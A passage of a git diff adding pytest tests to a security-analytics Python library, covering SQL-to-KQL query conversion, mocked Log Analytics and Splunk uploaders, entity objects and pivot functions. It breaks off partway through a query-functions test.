+        | project EventID, ParentImage, Image, Message, Otherfield
+        | join kind=inner (MyTable) on $right.mssg == $left.Message
+        | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+        and EventID == 1
+        and tolower(ParentImage) endswith 'explorer.exe'
+        and tolower(Image) startswith '.*3aka3'
+        | project Message, Otherfield, EventID
+        | distinct Message, Otherfield, EventID
+        )
+        | distinct *
+        | limit 10
+        | summarize any(Message), count(Otherfield) by Message
+        | order by Message desc, Otherfield
+        """,
+        id="union_groupby",
+        rename=None,
+    ),
+    SQLTestCase(
+        sql="""
+        SELECT DISTINCT ParentMessage as mssg, COUNT(Otherfield)
+        FROM (SELECT EventID as ID, ParentImage, Image, Message,
+            ParentImage + Message as ParentMessage,
+            LOWER(Otherfield) FROM apt29Host
+            )
+        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+            AND EventID = 1
+            AND LOWER(ParentImage) LIKE "%explorer.exe"
+        """,
+        kql="""
+        apt29Host
+        | extend ParentMessage = ParentImage + Message, Otherfield = tolower(Otherfield)
+        | project ID = EventID, ParentImage, Image, Message, ParentMessage, Otherfield
+        | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+        and EventID == 1
+        and tolower(ParentImage) endswith 'explorer.exe'
+        | extend Otherfield = count(Otherfield)
+        | project mssg = ParentMessage, Otherfield
+        | distinct *
+        """,
+        id="select_rename",
+        rename=None,
+    ),
+]
+
+
+@pytest.fixture(params=SQL_CASES, ids=lambda t: t[2])
+def get_sql_cases(request):
+    """Pytest fixture for parameterized tests."""
+    return request.param
+
+
+# pylint: disable=redefined-outer-name
+def test_sql_convert(get_sql_cases):
+    """Test SQL to KQL Conversion."""
+    sql, kql, test_id, rename = get_sql_cases
+    if rename:
+        kql_query = sql_to_kql.sql_to_kql(sql, target_tables=rename)
+    else:
+        kql_query = sql_to_kql.sql_to_kql(sql)
+    for line_test, line_expected in zip(
+        kql_query.strip().split("\n"), kql.strip().split("\n")
+    ):
+        check.equal(line_test.strip(), line_expected.strip(), f"TestID={test_id}")
diff --git a/tests/data/uploaders/__init__.py b/tests/data/uploaders/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/data/uploaders/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/data/uploaders/test_loganalytics_uploader.py b/tests/data/uploaders/test_loganalytics_uploader.py
new file mode 100644
index 000000000..39e392512
--- /dev/null
+++ b/tests/data/uploaders/test_loganalytics_uploader.py
@@ -0,0 +1,72 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Tests for the LogAnlaytics Uploader class."""
+
+from pathlib import Path
+from unittest.mock import patch
+import pytest
+
+from httpx import Response
+import pandas as pd
+
+from msticpy.data.uploaders.loganalytics_uploader import LAUploader
+from msticpy.common.exceptions import MsticpyConnectionError
+
+from ...unit_test_lib import get_test_data_path
+
+_TEST_DATA = get_test_data_path()
+
+
+# pylint: disable=protected-access, redefined-outer-name
+@pytest.fixture(scope="module")
+@patch("httpx.post")
+def la_uploader(mock_put):
+    """Generate LAUploader for testing."""
+    response = Response(200)
+    mock_put.return_value = response
+    la_uploader = LAUploader(workspace="1234", workspace_secret="password", debug=True)
+    return la_uploader
+
+
+@patch("httpx.post")
+def test_df_upload(mock_put, la_uploader):
+    """Check DataFrame upload."""
+    response = Response(200)
+    mock_put.return_value = response
+    data_path = Path(_TEST_DATA).joinpath("syslog_data.csv")
+    data = pd.read_csv(data_path)
+    la_uploader.upload_df(data, "test")
+
+
+@patch("httpx.post")
+def test_file_upload(mock_put, la_uploader):
+    """Check file upload."""
+    response = Response(200)
+    mock_put.return_value = response
+    data_path = Path(_TEST_DATA).joinpath("syslog_data.csv")
+    la_uploader.upload_file(data_path, "test")
+
+
+@patch("httpx.post")
+def test_folder_upload(mock_put, la_uploader):
+    """Check folder upload."""
+    response = Response(200)
+    mock_put.return_value = response
+    data_path = Path(_TEST_DATA).joinpath("uploader")
+    la_uploader.upload_folder(data_path, "test")
+    la_uploader.upload_folder(data_path)
+
+
+@patch("httpx.post")
+def test_upload_fails(mock_put, la_uploader):
+    """Check upload failure."""
+    response = Response(503)
+    mock_put.return_value = response
+    data_path = Path(_TEST_DATA).joinpath("syslog_data.csv")
+    data = pd.read_csv(data_path)
+    with pytest.raises(MsticpyConnectionError) as err:
+        la_uploader.upload_df(data, "test")
+        assert "LogAnalytics data upload failed with code 503" in str(err.value)
diff --git a/tests/data/uploaders/test_splunk_uploader.py b/tests/data/uploaders/test_splunk_uploader.py
new file mode 100644
index 000000000..07deee6bd
--- /dev/null
+++ b/tests/data/uploaders/test_splunk_uploader.py
@@ -0,0 +1,94 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Tests for the Splunk Uploader class."""
+from pathlib import Path
+from unittest.mock import MagicMock
+import pytest
+import pandas as pd
+
+from msticpy.data.uploaders.splunk_uploader import SplunkUploader
+from msticpy.common.exceptions import MsticpyUserError, MsticpyConnectionError
+
+from ...unit_test_lib import get_test_data_path
+
+_TEST_DATA = get_test_data_path()
+
+
+def load_index(sel, index_name, create):
+    """Return None if magic isn't == kql."""
+    del sel, index_name, create
+    return _MockSplunkIndex()
+
+
+class _MockSplunkIndex(MagicMock):
+    """Splunk index mock."""
+
+    def submit(self, data, sourcetype, host):  # pylint: disable=no-self-use
+        """Mock submit call."""
+        del data, sourcetype, host
+
+
+# pylint: disable=protected-access, redefined-outer-name
+@pytest.fixture(scope="module")
+def sp_upload():
+    """Generate SplunkUploader for testing."""
+    SplunkUploader._load_index = load_index
+    SplunkUploader._check_index.return_value = True
+    sp_upload = SplunkUploader(  # nosec
+        host="test",
+        username="test",
+        password="[PLACEHOLDER]",
+        debug=True,
+        connect=False,
+    )
+    sp_upload.connected = True
+    return sp_upload
+
+
+def test_df_upload(sp_upload):
+    """Test DataFrame upload."""
+    data_file = Path(_TEST_DATA).joinpath("syslog_data.csv")
+    data = pd.read_csv(data_file, parse_dates=["TimeGenerated"])
+    sp_upload.upload_df(data, "test_upload", "test_upload")
+
+
+def test_df_failure(sp_upload):
+    """Test DataFrame upload failure."""
+    with pytest.raises(MsticpyUserError):
+        sp_upload.upload_df("123", "test_upload", "test_upload")
+
+
+def test_file_upload(sp_upload):
+    """Test file upload."""
+    data_file = Path(_TEST_DATA).joinpath("syslog_data.csv")
+    sp_upload.upload_file(data_file, "test_upload", "test_upload")
+
+
+def test_file_failure(sp_upload):
+    """Test file upload failure."""
+    data_file = Path(_TEST_DATA).joinpath("win_proc_test.pkl")
+    with pytest.raises(MsticpyUserError):
+        sp_upload.upload_file(data_file, "test_upload", "test_upload")
+
+
+def test_folder_upload(sp_upload):
+    """Test folder upload."""
+    data_folder = Path(_TEST_DATA).joinpath("uploader")
+    sp_upload.upload_folder(data_folder, "test_upload", "test_upload")
+
+
+def test_folder_upload_no_name(sp_upload):
+    """Test folder upload with no name specified."""
+    data_folder = Path(_TEST_DATA).joinpath("uploader")
+    sp_upload.upload_folder(data_folder, "test_upload")
+
+
+def test_not_connected(sp_upload):
+    """Test no connection is handled correctly."""
+    sp_upload.connected = False
+    data_file = Path(_TEST_DATA).joinpath("syslog_data.csv")
+    with pytest.raises(MsticpyConnectionError):
+        sp_upload.upload_file(data_file, "test_upload", "test_upload")
diff --git a/tests/datamodel/__init__.py b/tests/datamodel/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/datamodel/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/datamodel/entities/__init__.py b/tests/datamodel/entities/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/datamodel/entities/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/datamodel/entities/test_entity.py b/tests/datamodel/entities/test_entity.py
new file mode 100644
index 000000000..c5e11834d
--- /dev/null
+++ b/tests/datamodel/entities/test_entity.py
@@ -0,0 +1,192 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+import json
+from datetime import datetime
+from pathlib import Path
+
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.datamodel import entities
+from msticpy.datamodel.entities import Alert, Host, IpAddress, OSFamily, Url
+from msticpy.datamodel.pivot import Pivot
+from msticpy.datamodel.soc.sentinel_alert import SentinelAlert
+
+from ...unit_test_lib import get_test_data_path
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name, broad-except
+
+
+@pytest.fixture(scope="module")
+def fixture_name():
+    """Fixture_docstring."""
+
+
+def test_entity_merge():
+    """Entity comparison and merging."""
+    host1 = Host(
+        HostName="host1",
+        DnsDomain="contoso.com",
+        OSFamily=OSFamily.Windows,
+        TimeGenerated=datetime(2022, 1, 24, 23, 5, 5, 728510),
+    )
+    host2 = Host(
+        HostName="host1",
+        DnsDomain="contoso.com",
+        IsDomainJoined=True,
+        TimeGenerated=datetime(2022, 1, 24, 23, 5, 5, 728510),
+    )
+    host3 = Host(HostName="host3", DnsDomain="contoso.com")
+
+    check.not_equal(host1, host2)
+    check.not_equal(host1, host3)
+
+    check.is_true(host1.is_equivalent(host2))
+    check.is_false(host1.is_equivalent(host3))
+    check.is_false(host2.is_equivalent(host3))
+
+    check.is_true(host1.can_merge(host2))
+    check.is_false(host1.can_merge(host3))
+
+    host4 = host1.merge(host2)
+    check.equal(host4.HostName, "host1")
+    check.equal(host4.OSFamily, OSFamily.Windows)
+    check.equal(host4.DnsDomain, "contoso.com")
+    check.is_true(host4.IsDomainJoined)
+
+
+def test_url():
+    """Test URL get_componennts."""
+    URL = "https://www.contoso.com/path#frag?query=xxx"
+    url = Url(Url=URL)
+    check.equal(url.Url, URL)
+    check.equal(url.host, "www.contoso.com")
+    check.equal(url.scheme, "https")
+    check.equal(url.path, "/path")
+    check.equal(url.fragment, "frag?query=xxx")
+
+    url.Url = "https://www.contoso2.com/path2#frag2?query=xxx"
+    check.equal(url.host, "www.contoso2.com")
+    check.equal(url.scheme, "https")
+    check.equal(url.path, "/path2")
+    check.equal(url.fragment, "frag2?query=xxx")
+
+
+def test_pivot_shortcuts():
+    """Test pivot function shortcut creation and deletion."""
+    Pivot()
+
+    check.is_true(hasattr(IpAddress, "util"))
+    util_ctnr = getattr(IpAddress, "util")
+    func = getattr(util_ctnr, "ip_type")
+
+    IpAddress.make_pivot_shortcut("util.ip_type", "test_iptype")
+    check.is_true(hasattr(IpAddress, "test_iptype"))
+    check.equal(func, IpAddress.test_iptype)
+
+    ip_addr = IpAddress(Address="192.168.1.2")
+
+    ip_df = ip_addr.test_iptype()
+    check.is_instance(ip_df, pd.DataFrame)
+
+    with pytest.raises(AttributeError):
+        IpAddress.make_pivot_shortcut("util.not_defined", "test_iptype")
+
+    with pytest.raises(TypeError):
+        IpAddress.make_pivot_shortcut("properties", "test_iptype")
+
+    with pytest.raises(AttributeError):
+        IpAddress.make_pivot_shortcut("util.ip_type", "test_iptype")
+
+    IpAddress.make_pivot_shortcut("util.ip_type", "test_iptype", overwrite=True)
+    check.is_true(hasattr(IpAddress, "test_iptype"))
+    check.equal(func, IpAddress.test_iptype)
+
+    IpAddress.del_pivot_shortcut("test_iptype")
+    check.is_false(hasattr(IpAddress, "test_iptype"))
+    with pytest.raises(AttributeError):
+        IpAddress.del_pivot_shortcut("test_iptype")
+
+    with pytest.raises(TypeError):
+        IpAddress.del_pivot_shortcut("properties")
+
+
+def test_entity_instantiation():
+    """Test that we can instantiate all entities."""
+    for attrib in dir(entities):
+        attr_cls = getattr(entities, attrib)
+        if (
+            isinstance(attr_cls, type)
+            and issubclass(attr_cls, entities.Entity)
+            and attr_cls != entities.Entity
+        ):
+            ent_obj = attr_cls()
+            check.greater(len(ent_obj.properties), 0)
+            # Check that we can access properties without incident
+            for attr in (attr for attr in dir(ent_obj) if not attr.startswith("_")):
+                getattr(ent_obj, attr)
+
+
+def test_entity_creation():
+    """Test creating entities from raw data."""
+
+    input_file = get_test_data_path().joinpath("entities.json")
+    with open(input_file, "r") as file_handle:
+        txt = file_handle.read()
+        entity_dict = json.loads(txt)
+
+    parsed_entities = []
+    for _, entity in entity_dict.items():
+        entity = entities.Entity.instantiate_entity(entity)
+
+        check.is_instance(entity, entities.Entity)
+
+        if entity["Type"] == "account":
+            check.is_instance(entity, entities.Account)
+            check.is_true("Name" in entity)
+            check.greater(len(entity.Name), 0)
+        elif entity["Type"] == "host":
+            check.is_instance(entity, entities.Host)
+            check.is_true("HostName" in entity)
+            check.greater(len(entity.HostName), 0)
+        elif entity["Type"] == "process":
+            check.is_instance(entity, entities.Process)
+            check.is_true("ProcessId" in entity)
+            check.greater(len(entity.ProcessId), 0)
+        elif entity["Type"] == "file":
+            check.is_instance(entity, entities.File)
+            check.is_true("Name" in entity)
+            check.greater(len(entity.Name), 0)
+        elif entity["Type"] == "ipaddress":
+            check.is_instance(entity, entities.IpAddress)
+            check.is_true("Address" in entity)
+            check.greater(len(entity.Address), 0)
+
+        parsed_entities.append(entity)
+
+    check.greater_equal(len(parsed_entities), 7)
+
+
+def test_alert_entity_creation():
+    """Test creation of Alert entity."""
+    data_path = Path(get_test_data_path()) / "localdata"
+    alert_df = pd.read_pickle(Path(data_path).joinpath("alerts_list.pkl"))
+    alert_entity = Alert(src_event=alert_df.iloc[0])
+    assert len(alert_entity.properties) == 15
+    assert alert_entity.SystemAlertIds == "f1ce87ca-8863-4a66-a0bd-a4d3776a7c64"
+
+
+def test_sentinel_entity_creation():
+    """Test creation of Sentinel Alert entity."""
+    data_path = Path(get_test_data_path()) / "localdata"
+    sent_alert_df = pd.read_pickle(Path(data_path).joinpath("alerts_list.pkl"))
+    sent_alert_entity = SentinelAlert(src_event=sent_alert_df.iloc[0])
+    assert len(sent_alert_entity.properties) == 29
+    assert "Search Query Results Overall Count" in sent_alert_entity.analytic
+    assert sent_alert_entity.is_in_log_analytics
diff --git a/tests/datamodel/test_pivot.py b/tests/datamodel/test_pivot.py
new file mode 100644
index 000000000..11a9181c4
--- /dev/null
+++ b/tests/datamodel/test_pivot.py
@@ -0,0 +1,322 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot main library test."""
+import warnings
+from collections import namedtuple
+from datetime import datetime, timedelta
+from typing import Optional
+
+import pytest
+import pytest_check as check
+from msticpy.common.timespan import TimeSpan
+from msticpy.data import QueryProvider
+from msticpy.data.query_container import QueryContainer
+from msticpy.datamodel import entities
+from msticpy.datamodel.pivot import Pivot
+from msticpy.sectools import GeoLiteLookup, TILookup
+
+__author__ = "Ian Hellen"
+
+pytestmark = pytest.mark.filterwarnings("ignore::UserWarning")
+# pylint: disable=redefined-outer-name
+
+_KQL_IMP_OK = False
+try:
+    # pylint: disable=unused-import
+    from msticpy.data.drivers import kql_driver
+
+    del kql_driver
+    _KQL_IMP_OK = True
+except ImportError:
+    pass
+
+_SPLUNK_IMP_OK = False
+try:
+    from msticpy.data.drivers import splunk_driver
+
+    del splunk_driver
+    _SPLUNK_IMP_OK = True
+except ImportError:
+    pass
+
+_IPSTACK_IMP_OK = False
+ip_stack_cls: Optional[type]
+try:
+    from msticpy.sectools import IPStackLookup as ip_stack_cls
+
+    _IPSTACK_IMP_OK = True
+except ImportError:
+    ip_stack_cls = None
+
+pytestmark = pytest.mark.skipif(not _KQL_IMP_OK, reason="Partial msticpy install")
+
+
+@pytest.fixture(scope="session")
+def data_providers():
+    """Return dict of providers."""
+    prov_dict = {}
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        if _KQL_IMP_OK:
+            prov_dict["az_sent_prov"] = QueryProvider("AzureSentinel")
+        prov_dict["mdatp_prov"] = QueryProvider("MDE")
+        if _SPLUNK_IMP_OK:
+            prov_dict["splunk_prov"] = QueryProvider("Splunk")
+        prov_dict["ti_lookup"] = TILookup()
+        prov_dict["geolite"] = GeoLiteLookup()
+
+    if _IPSTACK_IMP_OK:
+        prov_dict["ip_stack"] = ip_stack_cls()
+    return prov_dict
+
+
+def _reset_entities():
+    """Clear any query containers in entities."""
+    Pivot.remove_pivot_funcs(entity="all")
+
+
+PivotTestCase = namedtuple("PivotTestCase", "entity, container, funcs")
+_ENTITY_FUNCS = [
+    pytest.param(PivotTestCase("Host", "AzureSentinel", 25), id="Host-AzureSentinel"),
+    pytest.param(PivotTestCase("Host", "MDE", 2), id="Host-MDE"),
+    pytest.param(PivotTestCase("Host", "util", 3), id="Host-util"),
+    pytest.param(
+        PivotTestCase("IpAddress", "AzureSentinel", 15), id="IpAddress-AzureSentinel"
+    ),
+    pytest.param(PivotTestCase("IpAddress", "MDE", 2), id="IpAddress-MDE"),
+    pytest.param(PivotTestCase("IpAddress", "ti", 8), id="IpAddress-ti"),
+    pytest.param(PivotTestCase("IpAddress", "util", 4), id="IpAddress-util"),
+    pytest.param(
+        PivotTestCase("Account", "AzureSentinel", 16), id="Account-AzureSentinel"
+    ),
+    pytest.param(PivotTestCase("Account", "MDE", 4), id="Account-MDE"),
+    pytest.param(PivotTestCase("Url", "AzureSentinel", 2), id="Url-AzureSentinel"),
+    pytest.param(PivotTestCase("Url", "MDE", 2), id="Url-MDE"),
+    pytest.param(PivotTestCase("Url", "ti", 4), id="Url-ti"),
+    pytest.param(PivotTestCase("Url", "util", 5), id="Url-util"),
+]
+
+
+@pytest.fixture(scope="session")
+def _create_pivot_list(data_providers):
+    _reset_entities()
+    providers = data_providers.values()
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return Pivot(providers=providers)
+
+
+@pytest.mark.parametrize("test_case", _ENTITY_FUNCS)
+def test_pivot_providers(_create_pivot_list, test_case):
+    """
+    Test pivot intialized from provider list.
+
+    Notes
+    -----
+    Test that the expected number of functions have been added to entities.
+
+    """
+    entity = getattr(entities, test_case.entity)
+    query_contr = getattr(entity, test_case.container)
+    check.is_not_none(query_contr)
+    query_attrs = repr(query_contr).split("\n")
+    check.greater_equal(len(query_attrs), test_case.funcs)
+
+
+# # Generate test cases for pivot functions
+# def test_gen_tests(_create_pivot):
+#     """Function_docstring."""
+#     for entity_name in ("Host", "IpAddress", "Account", "Url"):
+#         entity = getattr(entities, entity_name)
+#         for container in ("AzureSentinel", "Splunk", "MDE", "ti", "util"):
+#             query_contr = getattr(entity, container, None)
+#             if not query_contr:
+#                 continue
+#             query_attrs = repr(query_contr).split("\n")
+#             piv_case = f'PivotTestCase("{entity_name}", "{container}", {len(query_attrs)})'
+#             print(f'    pytest.param({piv_case}, id=f"{entity_name}-{container}"),')
+#     assert False
+
+
+@pytest.fixture(scope="session")
+def _create_pivot_ns(data_providers):
+    _reset_entities()
+    locals().update(data_providers)
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return Pivot(namespace=locals())
+
+
+@pytest.mark.parametrize("test_case", _ENTITY_FUNCS)
+def test_pivot_providers_namespace(_create_pivot_ns, test_case):
+    """
+    Test pivot initialized from globals/namespace.
+
+    Notes
+    -----
+    Test that the expected number of functions have been added to entities.
+
+    """
+    entity = getattr(entities, test_case.entity)
+    query_contr = getattr(entity, test_case.container)
+    check.is_not_none(query_contr)
+    query_attrs = repr(query_contr).split("\n")
+    check.greater_equal(len(query_attrs), test_case.funcs)
+
+
+def _fake_provider_connected(provider):
+    # Lie to the query provider so that it will allow the call
+    # pylint: disable=protected-access
+    provider._query_provider._loaded = True
+    provider._query_provider._connected = True
+    # pylint: enable=protected-access
+
+
+class _TimeObj:
+    def __init__(self, start, end):
+        self.start = start
+        self.end = end
+
+
+def test_pivot_time(data_providers):
+    """Function_docstring."""
+    providers = data_providers.values()
+    end = datetime.utcnow()
+    start = end - timedelta(1)
+    timespan = TimeSpan(start=start, end=end)
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        pivot = Pivot(providers=providers, timespan=timespan)
+    check.equal(pivot.start, start)
+    check.equal(pivot.end, end)
+
+    end = end - timedelta(1)
+    start = start - timedelta(1)
+    # Test different ways of setting the time
+    timespan = TimeSpan(start=start, end=end)
+    pivot.timespan = timespan
+    check.equal(pivot.start, start)
+    check.equal(pivot.end, end)
+
+    pivot.timespan = _TimeObj(start=timespan.start, end=timespan.end)
+    check.equal(pivot.start, start)
+    check.equal(pivot.end, end)
+
+    pivot.set_timespan(timespan)
+    check.equal(pivot.start, start)
+    check.equal(pivot.end, end)
+
+    pivot.set_timespan(start=timespan.start, end=timespan.end)
+    check.equal(pivot.start, start)
+    check.equal(pivot.end, end)
+
+    # Make sure the values provided to queries match.
+    _fake_provider_connected(data_providers["az_sent_prov"])
+
+    query = entities.Host.AzureSentinel.wevt_processes(host_name="test", print=True)
+    check.is_in(start.isoformat(), query)
+    check.is_in(end.isoformat(), query)
+
+
+EntityQuery = namedtuple("EntityQuery", "entity, args, provider, pivot_func, expected")
+_ENTITY_QUERIES = [
+    pytest.param(
+        EntityQuery(
+            "Host",
+            dict(HostName="testhost", DnsDomain="contoso.com"),
+            "AzureSentinel",
+            "wevt_processes",
+            'Computer has "testhost.contoso.com"',
+        ),
+        id="Host",
+    ),
+    pytest.param(
+        EntityQuery(
+            "Account",
+            dict(Name="testacct"),
+            "AzureSentinel",
+            "wevt_logons",
+            'where Account has "testacct"',
+        ),
+        id="Account",
+    ),
+    pytest.param(
+        EntityQuery(
+            "IpAddress",
+            dict(Address="192.168.1.2"),
+            "AzureSentinel",
+            "hb_heartbeat",
+            '| where ComputerIP == "192.168.1.2"',
+        ),
+        id="IpAddress",
+    ),
+]
+
+
+@pytest.mark.parametrize("test_case", _ENTITY_QUERIES)
+def test_entity_attr_funcs(_create_pivot_ns, test_case):
+    """Test calling function with entity attributes."""
+    # Test entity
+    ent_cls = getattr(entities, test_case.entity)
+    entity = ent_cls(test_case.args)
+    _fake_provider_connected(_create_pivot_ns.get_provider("AzureSentinel"))
+    func = getattr(getattr(entity, test_case.provider), test_case.pivot_func)
+    query = func(entity, print_query=True)
+    check.is_in(test_case.expected, query)
+
+
+def test_misc_functions(_create_pivot_ns):
+    """Test some additional methods of pivot.py."""
+    check.greater(len(_create_pivot_ns.providers), 2)
+    t_span = TimeSpan(end=datetime.utcnow(), period="1D")
+    _create_pivot_ns.edit_query_time(timespan=t_span)
+    check.equal(_create_pivot_ns.start, t_span.start)
+    check.equal(_create_pivot_ns.end, t_span.end)
+    check.equal(_create_pivot_ns.timespan, t_span)
+
+
+_ENTITY_PIVOTS = [
+    pytest.param(entities.Host, 25, id="Host"),
+    pytest.param(entities.IpAddress, 25, id="IpAddress"),
+    pytest.param(entities.Account, 20, id="Account"),
+]
+
+
+@pytest.mark.parametrize("entity, expected_funcs", _ENTITY_PIVOTS)
+def test_entity_list_piv_functions(_create_pivot_list, entity, expected_funcs):
+    """Test the pivot_funcs property."""
+    check.greater(len(entity.get_pivot_list()), expected_funcs)
+
+
+def _get_piv_attrs(entity):
+    return [
+        attr
+        for attr in dir(entity)
+        if hasattr(getattr(entity, attr), "pivot_properties")
+        or type(getattr(entity, attr)).__name__ == "QueryContainer"
+    ]
+
+
+def test_remove_pivots(_create_pivot_ns):
+    """Test remove pivots function."""
+    piv_attrs = _get_piv_attrs(entities.Host)
+    check.is_true(piv_attrs)
+
+    with pytest.raises(ValueError):
+        Pivot.remove_pivot_funcs(entity="TestEntity")
+
+    piv_attrs = _get_piv_attrs(entities.Host)
+    check.is_true(piv_attrs)
+
+    Pivot.remove_pivot_funcs(entity="Host")
+    piv_attrs = _get_piv_attrs(entities.Host)
+    check.is_false(piv_attrs)
+
+    piv_attrs = _get_piv_attrs(entities.IpAddress)
+    check.is_true(piv_attrs)
+    Pivot.remove_pivot_funcs(entity="all")
+    piv_attrs = _get_piv_attrs(entities.IpAddress)
+    check.is_false(piv_attrs)
diff --git a/tests/datamodel/test_pivot_browser.py b/tests/datamodel/test_pivot_browser.py
new file mode 100644
index 000000000..80dac1f58
--- /dev/null
+++ b/tests/datamodel/test_pivot_browser.py
@@ -0,0 +1,59 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot pipeline browser UI."""
+import warnings
+
+import pytest
+import pytest_check as check
+
+try:
+    import pyperclip
+
+    _ENABLE_CLIP = True
+except ImportError:
+    _ENABLE_CLIP = False
+
+from msticpy.datamodel.pivot import Pivot
+from msticpy.datamodel.pivot_browser import PivotBrowser
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name, protected-access
+
+
+@pytest.fixture(scope="session")
+def _create_pivot():
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return Pivot()
+
+
+def test_pivot_browser(_create_pivot):
+    """Test pivot browser."""
+    browser = PivotBrowser()
+
+    check.is_in("File", browser._select["entities"].options)
+    check.is_in("Dns", browser._select["entities"].options)
+
+    browser._select["entities"].value = "Dns"
+    check.is_in("util.dns_components", browser._select["pivot_funcs"].options)
+
+    browser._select["pivot_funcs"].value = "util.dns_components"
+    check.is_in(
+        "Return&nbsp;components&nbsp;of&nbsp;domain", browser._html["func_help"].value
+    )
+
+    browser._text["search_txt"].value = "Vir"
+    check.is_in("ti.lookup_file_hash_VirusTotal", browser._html["search_res"].value)
+
+    browser._btn["copy"].click()
+
+    if _ENABLE_CLIP:
+        try:
+            cb_content = pyperclip.paste()
+            check.equal("entities.Dns.util.dns_components()", cb_content)
+        except pyperclip.PyperclipException:
+            print("Pyperclip not operational on this OS.")
diff --git a/tests/datamodel/test_pivot_data_queries_create.py b/tests/datamodel/test_pivot_data_queries_create.py
new file mode 100644
index 000000000..ce013c6f4
--- /dev/null
+++ b/tests/datamodel/test_pivot_data_queries_create.py
@@ -0,0 +1,261 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test query_functions module."""
+import warnings
+from datetime import datetime, timedelta
+from functools import partial
+
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.common.timespan import TimeSpan
+from msticpy.data import QueryProvider
+from msticpy.data.query_container import QueryContainer
+from msticpy.datamodel import entities
+from msticpy.datamodel.pivot_data_queries import (
+    PivotQueryFunctions,
+    add_queries_to_entities,
+    _create_pivot_func,
+)
+
+_KQL_IMP_OK = False
+try:
+    # pylint: disable=unused-import
+    from msticpy.data.drivers import kql_driver
+
+    del kql_driver
+    _KQL_IMP_OK = True
+except ImportError:
+    pass
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="module")
+def azure_sentinel():
+    """Fixture to get loaded Azure Sentinel Provider."""
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return QueryProvider("AzureSentinel")
+
+
+@pytest.mark.skipif(not _KQL_IMP_OK, reason="Partial msticpy install")
+def test_create_query_functions(azure_sentinel):
+    """Test basic creation of query functions class."""
+    az_qry_funcs = PivotQueryFunctions(azure_sentinel)
+
+    check.greater_equal(len(az_qry_funcs.param_usage), 30)
+    check.greater_equal(len(az_qry_funcs.query_params), 70)
+
+
+@pytest.mark.skipif(not _KQL_IMP_OK, reason="Partial msticpy install")
+def test_query_functions_methods(azure_sentinel):
+    """Test attributes of retrieved functions."""
+    az_qry_funcs = PivotQueryFunctions(azure_sentinel)
+
+    ip_addr_q_params = list(az_qry_funcs.get_queries_and_types_for_param("ip_address"))
+    host_queries = list(az_qry_funcs.get_queries_for_param("host_name"))
+
+    check.greater_equal(len(ip_addr_q_params), 4)
+    check.greater_equal(len(host_queries), 20)
+
+    func_name, func_family, func = [
+        q_tup for q_tup in host_queries if q_tup[0] == "get_info_by_hostname"
+    ][0]
+    check.is_instance(func, partial)
+    check.is_true(callable(func))
+
+    q_params = az_qry_funcs.query_params.get(f"{func_family}.{func_name}")
+    # expected results
+    # all=['table', 'query_project', 'start', 'end', 'subscription_filter',
+    #  'add_query_items', 'host_name', 'host_op'],
+    # required=['host_name'],
+    # full_required=['start', 'end', 'host_name']
+    check.is_in("start", q_params.all)
+    check.is_in("host_name", q_params.required)
+    check.is_in("host_name", q_params.full_required)
+    check.is_in("start", q_params.full_required)
+    check.is_in("end", q_params.full_required)
+
+    param_attrs = az_qry_funcs.get_param_attrs("ip_address")
+    # Expected return
+    # [ParamAttrs(type='str', query='get_info_by_ipaddress', family='Heartbeat',
+    #  required=True),
+    # ParamAttrs(type='str', query='list_logons_for_source_ip', family='LinuxSyslog',
+    #  required=True),
+    # ParamAttrs(type='str', query='get_host_for_ip', family='Network',
+    #  required=True),
